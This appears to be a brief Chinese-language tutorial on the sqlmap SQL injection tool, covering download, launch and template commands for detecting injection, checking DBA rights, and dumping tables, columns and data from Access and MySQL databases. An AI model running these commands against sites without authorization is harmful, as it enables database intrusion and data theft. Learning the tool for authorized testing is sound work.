sqlmap工具的介绍
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。
sqlmap工具下载
官方网站下载http://sqlmap.org/ 点击下载
sqlmap工具启动
1,需要在启动电脑上安装python环境
2,在安装目录下,启动cmd窗口,然后调用python运行
sqlmap工具使用
一。注入access数据库常用的参数
sqlmap.py -u "url" //判断参数是否存在注入
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段数据
二。注入MySQL数据库常用参数
sqlmap.py -u "url" //判断参数是否存在注入
sqlmap.py -u "url" --current-db //查看网站当前数据库
sqlmap.py -u "url" --is-dba //查看当前用户权限
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段数据
相关文章
暂无评论...
